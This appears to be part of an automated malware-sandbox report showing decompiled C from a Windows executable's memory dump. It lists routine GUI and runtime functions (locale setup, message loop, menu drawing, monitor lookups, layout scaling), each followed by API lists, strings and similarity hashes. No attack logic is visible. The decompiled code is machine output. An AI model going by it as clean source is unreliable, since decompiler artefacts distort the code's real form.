Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileLoadModuleNameQueryStringVirtual String ID: Lv@$Tv@ API String ID: 902310565-3490928387 Opcode ID: 24279c15491266c301eb2aa81648ac00ce9ad9d101245f32d7359d387ba785dc Instruction ID: c01818685c40b8fea18ad10fd3e77254e6e7d063cfafddee118467fe47f8fec1 Opcode Fuzzy Hash: 24279c15491266c301eb2aa81648ac00ce9ad9d101245f32d7359d387ba785dc Instruction Fuzzy Hash: 30413670900668DFDB61DF64CC84BDAB7F5AB49304F4040EAE508AB391D7B8AE84CF95

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 65%

E0040BA08(void* __ebx, void* __edi, void* __esi) { int _v8; signed int _v12; char _v16; char _v20; char _v24; char _v28; void* _t53; void* _t54; intOrPtr _t80; void* _t83; void* _t84; void* _t86; void* _t87; intOrPtr _t90; _t89 = _t90; _push(0); _push(0); _push(0); _push(0); _push(0); _push(0); _push(_t90); _push(0x40bb1b); _push( *[fs:eax]); *[fs:eax] = _t90; _v8 = GetThreadLocale(); _t53 = 1; _t86 = 0x465830; _t83 = 0x465860; do { _t3 = _t53 + 0x44; // 0x45 E0040B9CC(_t3 - 1, _t53 - 1, &_v16, 0xb, _t89); E00404790(_t86, _v16); _t6 = _t53 + 0x38; // 0x39 E0040B9CC(_t6 - 1, _t53 - 1, &_v20, 0xb, _t89); E00404790(_t83, _v20); _t53 = _t53 + 1; _t83 = _t83 + 4; _t86 = _t86 + 4; } while (_t53 != 0xd); _t54 = 1; _t87 = 0x465890; _t84 = 0x4658ac; do { _t8 = _t54 + 5; // 0x6 asm("cdq"); _v12 = _t8 % 7; E0040B9CC(_v12 + 0x31, _t54 - 1, &_v24, 6, _t89); E00404790(_t87, _v24); E0040B9CC(_v12 + 0x2a, _t54 - 1, &_v28, 6, _t89); E00404790(_t84, _v28); _t54 = _t54 + 1; _t84 = _t84 + 4; _t87 = _t87 + 4; } while (_t54 != 8); _pop(_t80); *[fs:eax] = _t80; _push(E0040BB22); return E00404760( &_v28, 4); } 0x0040ba09 0x0040ba0d 0x0040ba0e 0x0040ba0f 0x0040ba10 0x0040ba11 0x0040ba12 0x0040ba18 0x0040ba19 0x0040ba1e 0x0040ba21 0x0040ba29 0x0040ba2c 0x0040ba31 0x0040ba36 0x0040ba3b 0x0040ba4a 0x0040ba4e 0x0040ba59 0x0040ba6d 0x0040ba71 0x0040ba7c 0x0040ba81 0x0040ba82 0x0040ba85 0x0040ba88 0x0040ba8d 0x0040ba92 0x0040ba97 0x0040ba9c 0x0040ba9c 0x0040baa4 0x0040baa7 0x0040babf 0x0040baca 0x0040bae4 0x0040baef 0x0040baf4 0x0040baf5 0x0040baf8 0x0040bafb 0x0040bb02 0x0040bb05 0x0040bb08 0x0040bb1a

APIs

GetThreadLocale.KERNEL32(00000000,0040BB1B,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040BA24

Strings

w@ , xrefs: 0040BAB1 $x@ , xrefs: 0040BAD6 ,w@ , xrefs: 0040BA42

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: LocaleThread String ID: $x@$,w@$w@ API String ID: 635194068-3772529897 Opcode ID: 190d255e8ff991ed6adefd9f30e002100e668f39c50ea463852dc53f0779f4e0 Instruction ID: ff42a5d57a33c53001075c18811d422212253fa3653e9f98a0f8edc246bfd2b8 Opcode Fuzzy Hash: 190d255e8ff991ed6adefd9f30e002100e668f39c50ea463852dc53f0779f4e0 Instruction Fuzzy Hash: E33178B1F005085BD704EA95D881BAF77A9DBC8314F65443BFA09E7381D73DAD0186AD

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 72%

E004577C4(int __eax, void* __ebx, void* __edi, void* __esi) { int _v8; char _v9; char _v16; char _v20; intOrPtr _t39; long _t44; int _t59; void* _t70; intOrPtr _t74; intOrPtr* _t75; intOrPtr _t76; void* _t82; void* _t83; intOrPtr _t84; _t80 = __esi; _t79 = __edi; _t82 = _t83; _t84 = _t83 + 0xfffffff0; _push(__ebx); _push(__esi); _push(__edi); _v16 = 0; _v20 = 0; _v8 = __eax; _push(_t82); _push(0x457911); _push( *[fs:eax]); *[fs:eax] = _t84; _t63 = E00457738(_v8); if( *((char*)(_v8 + 0x88)) != 0) { _t59 = _v8; _t86 = *((intOrPtr*)(_t59 + 0x48)); if( *((intOrPtr*)(_t59 + 0x48)) == 0) { E00457D90(_v8, 0, _t70); } } E00455250(_t63, &_v20); E00437730(_v20, 0, &_v16, _t86); _t39 = *0x466580; // 0x27bf470 E004579C0(_t39, _v16, _t86); _v9 = 1; _push(_t82); _push(0x4578b8); _push( *[fs:eax]); *[fs:eax] = _t84; if( *((short*)(_v8 + 0x12a)) != 0) { _t63 = _v8; *((intOrPtr*)(_v8 + 0x128))(); } if(_v9 != 0) { _t24 = _v8 + 0xc0; // 0xbea6e800 _t63 = *_t24; if(_t63 > 0) { __eflags = *0x4665a0; if( *0x4665a0 == 0) { *0x4665a0 = SetTimer(0, 0, _t63, E0045775C); __eflags = *0x4665a0; if( *0x4665a0 == 0) { E004576D4(); } } } else { E004576D4(); } } _pop(_t74); *[fs:eax] = _t74; _t44 = GetCurrentThreadId(); _t75 = *0x462f38; // 0x463034 if(_t44 == *_t75 && E0042048C(0, _t63, _t79, _t80) != 0) { _v9 = 0; } if(_v9 != 0) { WaitMessage(); } _pop(_t76); *[fs:eax] = _t76; _push(E00457918); return E00404760( &_v20, 2); } 0x004577c4 0x004577c4 0x004577c5 0x004577c7 0x004577ca 0x004577cb 0x004577cc 0x004577cf 0x004577d2 0x004577d5 0x004577da 0x004577db 0x004577e0 0x004577e3 0x004577ee 0x004577fa 0x004577fc 0x004577ff 0x00457803 0x00457808 0x00457808 0x00457803 0x00457812 0x0045781d 0x00457825 0x0045782a 0x0045782f 0x00457835 0x00457836 0x0045783b 0x0045783e 0x0045784c 0x00457851 0x0045785d 0x0045785d 0x00457867 0x0045786c 0x0045786c 0x00457874 0x00457880 0x00457887 0x00457898 0x0045789d 0x004578a4 0x004578a9 0x004578a9 0x004578a4 0x00457876 0x00457879 0x00457879 0x00457874 0x004578b0 0x004578b3 0x004578cd 0x004578d2 0x004578da 0x004578e7 0x004578e7 0x004578ef 0x004578f1 0x004578f1 0x004578f8 0x004578fb 0x004578fe 0x00457910

APIs

Part of subcall function 00457738: GetCursorPos.USER32 ref: 0045773F SetTimer.USER32 ref: 00457893 GetCurrentThreadId.KERNEL32 ref: 004578CD WaitMessage.USER32(00000000,00457911,?,?,?,00460C02), ref: 004578F1

Strings

40F , xrefs: 004578D2

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentCursorMessageThreadTimerWait String ID: 40F API String ID: 3909455694-2631550472 Opcode ID: 024d60afcb6fa436a8515f78470afffda0a18e1312202335da47132cbf8f2364 Instruction ID: e89649fe14110faf48328d87229489a930fd8d9713066124e3e3ff92809c3fcb Opcode Fuzzy Hash: 024d60afcb6fa436a8515f78470afffda0a18e1312202335da47132cbf8f2364 Instruction Fuzzy Hash: 0E419330A08204AFDB11EBA4E886B9E77F5EF04315F6144BAEC0097393D7786E48CB59

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%

E0043394C(intOrPtr* __eax) { struct tagMENUITEMINFOA _v128; intOrPtr _v132; int _t16; intOrPtr* _t29; struct HMENU__* _t36; MENUITEMINFOA* _t37; _t37 = &_v128; _t29 = __eax; _t16 = *0x462f3c; // 0x4658c8 if( *((char*)(_t16 + 0xd)) != 0 && *((intOrPtr*)(__eax + 0x38)) != 0) { _t36 = *((intOrPtr*)( *__eax + 0x34))(); _t37->cbSize = 0x2c; _v132 = 0x10; _v128.hbmpUnchecked = &(_v128.cch); _v128.dwItemData = 0x50; _t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37); if(_t16 != 0) { _t16 = E00433CE0(_t29); asm("sbb edx, edx"); if(_t16 != (_v128.cbSize & 0x00006000) + 1) { _v128.cbSize = ((E00433CE0(_t29) & 0x0000007f) << 0x0000000d) + ((E00433CE0(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff; _v132 = 0x10; _t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37); if(_t16 != 0) { return DrawMenuBar( *(_t29 + 0x38)); } } } } return _t16; } 0x0043394e 0x00433951 0x00433953 0x0043395c 0x00433973 0x00433975 0x0043397c 0x00433988 0x0043398c 0x0043399a 0x004339a1 0x004339a5 0x004339b7 0x004339bc 0x004339da 0x004339de 0x004339ec 0x004339f3 0x00000000 0x004339f9 0x004339f3 0x004339bc 0x004339a1 0x00433a06

APIs

GetMenuItemInfoA.USER32 ref: 0043399A SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 004339EC DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 004339F9

Strings

P , xrefs: 0043398C

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$InfoItem$Draw String ID: P API String ID: 3227129158-3110715001 Opcode ID: fa58c7a9b2e32d2e266c9545e896ff45175c2863883d5026e0fe250c8b0133d9 Instruction ID: 1a0cb4ff114c7cd32e92c9fa77bceba14735dfb38598f85aa0acc494823d54c1 Opcode Fuzzy Hash: fa58c7a9b2e32d2e266c9545e896ff45175c2863883d5026e0fe250c8b0133d9 Instruction Fuzzy Hash: EF11C470605210AFD310DF29CC85B4B76D4AF88366F149669F094D73E9D77DC984C78A

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 68%

E00422F78(intOrPtr _a4, intOrPtr _a8, signed int _a12) { void* __ebx; void* __edi; void* __esi; void* __ebp; void* _t15; void* _t16; intOrPtr _t18; signed int _t19; void* _t20; intOrPtr _t21; _t19 = _a12; if( *0x46633b != 0) { _t16 = 0; if((_t19 & 0x00000003) != 0) { L7: _t16 = 0x12340042; } else { _t21 = _a4; if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) { goto L7; } } } else { _t18 = *0x46631c; // 0x422f78 *0x46631c = E00422CE4(3, _t15, _t18, _t19, _t20); _t16 = *0x46631c(_a4, _a8, _t19); } return _t16; } 0x00422f7e 0x00422f88 0x00422fb2 0x00422fbb 0x00422fe3 0x00422fe3 0x00422fbd 0x00422fbd 0x00422fc2 0x00000000 0x00000000 0x00422fc2 0x00422f8a 0x00422f8f 0x00422f9c 0x00422fae 0x00422fae 0x00422fee

APIs

GetSystemMetrics.USER32 ref: 00422FC6 GetSystemMetrics.USER32 ref: 00422FD8 Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63

Strings

x/B , xrefs: 00422F8F, 00422F9C, 00422FA8 MonitorFromPoint , xrefs: 00422F8A

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$AddressProc String ID: MonitorFromPoint$x/B API String ID: 1792783759-3362865607 Opcode ID: 44c87fef4cfb7df56709ba947901e1d111c4d3eb60895fa92bde7c443fd75764 Instruction ID: 8c996490f865ef833d6f29e33133d28ea07156a354397cb3f82660790c2b9ebf Opcode Fuzzy Hash: 44c87fef4cfb7df56709ba947901e1d111c4d3eb60895fa92bde7c443fd75764 Instruction Fuzzy Hash: 5D01DF313001247BDB009F05EE44B5ABB60E710314FC28037FC049A3A0D3F98C81EBA9

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 68%

E00422E50(intOrPtr* _a4, signed int _a8) { void* __ebx; void* __edi; void* __esi; void* __ebp; intOrPtr* _t14; intOrPtr _t16; signed int _t17; void* _t18; void* _t19; _t17 = _a8; _t14 = _a4; if( *0x46633a != 0) { _t19 = 0; if((_t17 & 0x00000003) != 0 || *((intOrPtr*)(_t14 + 8)) > 0 && *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) > *_t14 && GetSystemMetrics(1) > *((intOrPtr*)(_t14 + 4))) { _t19 = 0x12340042; } } else { _t16 = *0x466318; // 0x422e50 *0x466318 = E00422CE4(2, _t14, _t16, _t17, _t18); _t19 = *0x466318(_t14, _t17); } return _t19; } 0x00422e56 0x00422e59 0x00422e63 0x00422e88 0x00422e91 0x00422eb8 0x00422eb8 0x00422e65 0x00422e6a 0x00422e77 0x00422e84 0x00422e84 0x00422ec3

APIs

GetSystemMetrics.USER32 ref: 00422EA1 GetSystemMetrics.USER32 ref: 00422EAD Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63

Strings

MonitorFromRect , xrefs: 00422E65 P.B , xrefs: 00422E6A, 00422E77, 00422E7E

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$AddressProc String ID: MonitorFromRect$P.B API String ID: 1792783759-2213800761 Opcode ID: d1312910f7091c19559ba0fe7ce2875f1198a4a289036ac6f49b1dab6c252c78 Instruction ID: 344e9d6dab49e3fdbc3704bf19803c74fdffa6d0553f2af2d0679323b2ac8f6f Opcode Fuzzy Hash: d1312910f7091c19559ba0fe7ce2875f1198a4a289036ac6f49b1dab6c252c78 Instruction Fuzzy Hash: 37018B32700224BBDB208B04EA85B1AB758F740724F868462FC04CA342C3F89C80DBFA

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0040D85C() { _Unknown_base(*)()* _t1; struct HINSTANCE__* _t3; _t1 = GetModuleHandleA("kernel32.dll"); _t3 = _t1; if(_t3 != 0) { _t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA"); *0x46182c = _t1; } if( *0x46182c == 0) { *0x46182c = E00408F94; return E00408F94; } return _t1; } 0x0040d862 0x0040d867 0x0040d86b 0x0040d873 0x0040d878 0x0040d878 0x0040d884 0x0040d88b 0x00000000 0x0040d88b 0x0040d891

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0046010B,00000000,0046011E), ref: 0040D862 GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040D873

Strings

kernel32.dll , xrefs: 0040D85D GetDiskFreeSpaceExA , xrefs: 0040D86D

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc String ID: GetDiskFreeSpaceExA$kernel32.dll API String ID: 1646373207-3712701948 Opcode ID: 2e2f4f89079191d4818a05b952f3a92a1b3673e8b5a347ee851826118ffcadc1 Instruction ID: f92f8e55d4f3d77ad231ec8b499964c1603e405444d36c9258ecd07ec0a69fbb Opcode Fuzzy Hash: 2e2f4f89079191d4818a05b952f3a92a1b3673e8b5a347ee851826118ffcadc1 Instruction Fuzzy Hash: 30D09EE6A003519EEB11BBF65881A2636D49B14308B18843BE151B62E2E7FDC818CF9D

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 91%

E0043D9E0(signed int __eax, int* __ecx, void* __edx, char _a4, intOrPtr* _a8, void* _a12, signed int _a16) { signed int _v8; signed int _v12; signed int _v16; signed int _v20; signed int _v24; char _v40; signed int _t170; signed int _t181; void* _t194; void* _t198; int _t218; int _t223; int _t228; signed int _t229; void* _t237; signed int _t238; int* _t244; signed int _t274; signed int _t276; signed int _t278; void* _t284; intOrPtr* _t290; void* _t292; void* _t302; void* _t304; _t170 = __eax; asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t244 = __ecx; _t292 = __edx; _v8 = __eax; _t290 = _a8; if(_a16 == 0) { L2: if( *(_t292 + 0x175) == 0 || *(_t292 + 0x179) == 0) { L30: if(_a16 == 0) { L55: return _t170; } L31: _v20 = *((intOrPtr*)(_t290 + 8)) - *_t290; if(_v20 < 0) { L34: _v20 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); L35: _v24 = *((intOrPtr*)(_t290 + 0xc)) - *((intOrPtr*)(_t290 + 4)); if(_v24 < 0) { L38: _v24 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); L39: _v12 = *_t290; _v16 = *((intOrPtr*)(_t290 + 4)); _t181 = _a16 & 0x000000ff; if(_t181 > 6) { L46: E00447BB8( *((intOrPtr*)(_t292 + 0x78)), _v12, 1, _v24, _v20); if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))() != _v20) { L48: _t170 = _a16 & 0x000000ff; if(_t170 > 5) { goto L55; } switch( *((intOrPtr*)(_t170 * 4 + &M0043DD0B))) { case 0: goto L55; case 1: _t189 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); *((intOrPtr*)(_t290 + 4)) = *((intOrPtr*)(_t290 + 4)) - _v24 - _t189; return _t189; case 2: __edx = 3; __eax = *(__esi + 0x78); __ecx = *( *(__esi + 0x78)); __eax = *((intOrPtr*)( *( *(__esi + 0x78)) + 0x10))(); _v24 = _v24 - __eax; *(__edi + 0xc) = *(__edi + 0xc) + _v24 - __eax; return __eax; case 3: __edx = 2; __eax = *(__esi + 0x78); __ecx = *( *(__esi + 0x78)); __eax = *((intOrPtr*)( *( *(__esi + 0x78)) + 0x10))(); _v20 = _v20 - __eax; *__edi = *__edi - _v20 - __eax; return __eax; case 4: __edx = 2; __eax = *(__esi + 0x78); __ecx = *( *(__esi + 0x78)); __eax = *((intOrPtr*)( *( *(__esi + 0x78)) + 0x10))(); _v20 = _v20 - __eax; *(__edi + 8) = *(__edi + 8) + _v20 - __eax; return __eax; case 5: __edx = 2; __eax = *(__esi + 0x78); __ecx = *( *(__esi + 0x78)); __eax = *((intOrPtr*)( *( *(__esi + 0x78)) + 0x10))(); _v20 = _v20 - __eax; *(__edi + 8) = *(__edi + 8) + _v20 - __eax; __edx = 3; __eax = *(__esi + 0x78); __ecx = *( *(__esi + 0x78)); __eax = *((intOrPtr*)( *( *(__esi + 0x78)) + 0x10))(); _v24 = _v24 - __eax; _t168 = __edi + 0xc; *_t168 = *(__edi + 0xc) + _v24 - __eax; __eflags = *_t168; return __eax; } } _t170 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); if(_t170 == _v24) { goto L55; } goto L48; } switch( *((intOrPtr*)(_t181 * 4 + &M0043DC43))) { case 0: goto L46; case 1: *((intOrPtr*)(_t290 + 4)) = *((intOrPtr*)(_t290 + 4)) + _v24; goto L46; case 2: __eax = _v24; *(__edi + 0xc) = *(__edi + 0xc) - _v24; __eax = *(__edi + 0xc); _v16 = __eax; goto L46; case 3: __eax = _v20; *__edi = *__edi + __eax; goto L46; case 4: __eax = _v20; *(__edi + 8) = *(__edi + 8) - _v20; __eax = *(__edi + 8); _v12 = __eax; goto L46; case 5: __eax = *(__esi + 0x40); _v12 = *(__esi + 0x40); __eax = *(__esi + 0x44); _v16 = *(__esi + 0x44); __eax = &_v16; _push( &_v16); __eax = &_v20; _push( &_v20); __eax = &_v24; _push( &_v24); _push(__edi); __eax = &_v40; _push( &_v40); __ecx = &_v12; __edx = __esi; __eax = _v8; __eax = *((intOrPtr*)( *_v8 + 0xac))(); goto L46; } } _t194 = (_a16 & 0x000000ff) - 0xffffffffffffffff; if(_t194 < 0 || _t194 == 3) { goto L38; } else { goto L39; } } _t198 = (_a16 & 0x000000ff) + 0xfd - 2; if(_t198 < 0 || _t198 == 1) { goto L34; } else { goto L35; } } else { _v12 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); _v16 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); _v20 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); _v24 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); if(( *(_t292 + 0x61) & 0x00000004) == 0) { __eflags = *(_t292 + 0x61) & 0x00000001; if(__eflags == 0) { _t238 = _t237 - _t284; __eflags = _t238; _v12 = _t238; } } else { if(( *(_t292 + 0x61) & 0x00000001) == 0) { _v12 = *_t244 - *(_t292 + 0x175) - *((intOrPtr*)(_t292 + 0x165)); } else { _v20 = *_t244 - *(_t292 + 0x175) - *((intOrPtr*)(_t292 + 0x165)); } } if(( *(_t292 + 0x61) & 0x00000008) == 0) { __eflags = *(_t292 + 0x61) & 0x00000002; if(__eflags == 0) { _t228 = MulDiv( *(_t292 + 0x169), _t244[1], *(_t292 + 0x179)); _t278 = _v24 >> 1; if(__eflags < 0) { asm("adc edx, 0x0"); } _t229 = _t228 - _t278; __eflags = _t229; _v16 = _t229; } } else { if(( *(_t292 + 0x61) & 0x00000002) == 0) { _v16 = _t244[1] - *(_t292 + 0x179) - *(_t292 + 0x169); } else { _v24 = _t244[1] - *(_t292 + 0x179) - *(_t292 + 0x169); } } if(_a4 != 0) { _t302 = ( *0x43ddb8 & 0x000000ff) - ( *0x43ddb4 & 0x000000ff & *(_t292 + 0x61)); if(_t302 != 0) { _t223 = MulDiv( *(_t292 + 0x16d), *_t244, *(_t292 + 0x175)); _t276 = _v20 >> 1; if(_t302 < 0) { asm("adc edx, 0x0"); } _v12 = _t223 - _t276; } _t304 = ( *0x43ddb8 & 0x000000ff) - ( *0x43ddbc & 0x000000ff & *(_t292 + 0x61)); if(_t304 != 0) { _t218 = MulDiv( *(_t292 + 0x171), _t244[1], *(_t292 + 0x179)); _t274 = _v24 >> 1; if(_t304 < 0) { asm("adc edx, 0x0"); } _v16 = _t218 - _t274; } } _t170 = E00447BB8( *((intOrPtr*)(_t292 + 0x78)), _v12, 1, _v24, _v20); goto L30; } } _t7 = (_a16 & 0x000000ff) + 0x462568; // 0xb0d0703 _t170 = *_t7 & 0x000000ff; if(_t170 == *((intOrPtr*)(__edx + 0x61))) { goto L31; } goto L2; } 0x0043d9e0 0x0043d9ef 0x0043d9f0 0x0043d9f1 0x0043d9f2 0x0043d9f3 0x0043d9f5 0x0043d9f7 0x0043d9fa 0x0043da01 0x0043da17 0x0043da1e 0x0043dbc6 0x0043dbca 0x0043ddae 0x0043ddae 0x0043ddae 0x0043dbd0 0x0043dbd5 0x0043dbdc 0x0043dbec 0x0043dbf9 0x0043dbfc 0x0043dc02 0x0043dc09 0x0043dc18 0x0043dc25 0x0043dc28 0x0043dc2a 0x0043dc30 0x0043dc33 0x0043dc3a 0x0043dcb7 0x0043dcca 0x0043dcdf 0x0043dcf7 0x0043dcf7 0x0043dcfe 0x00000000 0x00000000 0x0043dd04 0x00000000 0x00000000 0x00000000 0x0043dd2d 0x0043dd35 0x00000000 0x00000000 0x0043dd3a 0x0043dd3f 0x0043dd42 0x0043dd44 0x0043dd4a 0x0043dd4c 0x00000000 0x00000000 0x0043dd51 0x0043dd56 0x0043dd59 0x0043dd5b 0x0043dd61 0x0043dd63 0x00000000 0x00000000 0x0043dd67 0x0043dd6c 0x0043dd6f 0x0043dd71 0x0043dd77 0x0043dd79 0x00000000 0x00000000 0x0043dd7e 0x0043dd83 0x0043dd86 0x0043dd88 0x0043dd8e 0x0043dd90 0x0043dd93 0x0043dd98 0x0043dd9b 0x0043dd9d 0x0043dda3 0x0043dda5 0x0043dda5 0x0043dda5 0x00000000 0x00000000 0x0043dd04 0x0043dceb 0x0043dcf1 0x00000000 0x00000000 0x00000000 0x0043dcf1 0x0043dc3c 0x00000000 0x00000000 0x00000000 0x0043dc62 0x00000000 0x00000000 0x0043dc67 0x0043dc6a 0x0043dc6d 0x0043dc70 0x00000000 0x00000000 0x0043dc75 0x0043dc78 0x00000000 0x00000000 0x0043dc7c 0x0043dc7f 0x0043dc82 0x0043dc85 0x00000000 0x00000000 0x0043dc8a 0x0043dc8d 0x0043dc90 0x0043dc93 0x0043dc96 0x0043dc99 0x0043dc9a 0x0043dc9d 0x0043dc9e 0x0043dca1 0x0043dca2 0x0043dca3 0x0043dca6 0x0043dca7 0x0043dcaa 0x0043dcac 0x0043dcb1 0x00000000 0x00000000 0x0043dc3c 0x0043dc10 0x0043dc12 0x00000000 0x00000000 0x00000000 0x00000000 0x0043dc12 0x0043dbe4 0x0043dbe6 0x00000000 0x00000000 0x00000000 0x00000000 0x0043da31 0x0043da3b 0x0043da4b 0x0043da5b 0x0043da6b 0x0043da72 0x0043daa4 0x0043daa8 0x0043daca 0x0043daca 0x0043dacc 0x0043dacc 0x0043da74 0x0043da78 0x0043da9f 0x0043da7a 0x0043da8a 0x0043da8a 0x0043da78 0x0043dad3 0x0043db07 0x0043db0b 0x0043db1f 0x0043db27 0x0043db29 0x0043db2b 0x0043db2b 0x0043db2e 0x0043db2e 0x0043db30 0x0043db30 0x0043dad5 0x0043dad9 0x0043db02 0x0043dadb 0x0043daec 0x0043daec 0x0043dad9 0x0043db37 0x0043db4a 0x0043db4c 0x0043db5f 0x0043db67 0x0043db69 0x0043db6b 0x0043db6b 0x0043db70 0x0043db70 0x0043db84 0x0043db86 0x0043db9a 0x0043dba2 0x0043dba4 0x0043dba6 0x0043dba6 0x0043dbab 0x0043dbab 0x0043db86 0x0043dbc1 0x00000000 0x0043dbc1 0x0043da1e 0x0043da07 0x0043da07 0x0043da11 0x00000000 0x00000000 0x00000000

APIs

MulDiv.KERNEL32(?,00000000,00000000), ref: 0043DB5F MulDiv.KERNEL32(?,?,?), ref: 0043DB9A

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: ac93a01106b9b8afdc737577d4b32e1d48ec0ca0db69446e1e7388fe02ce81ee Instruction ID: 362d5403a1925025f21cd0c7a8b8993e4e77c4d1e46d8b923cef89c0b287574d Opcode Fuzzy Hash: ac93a01106b9b8afdc737577d4b32e1d48ec0ca0db69446e1e7388fe02ce81ee Instruction Fuzzy Hash: 89D16870A04A059FDB11CF69C484AAABBF6FF89300F24895AE856DB754C738FD41CB51

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%

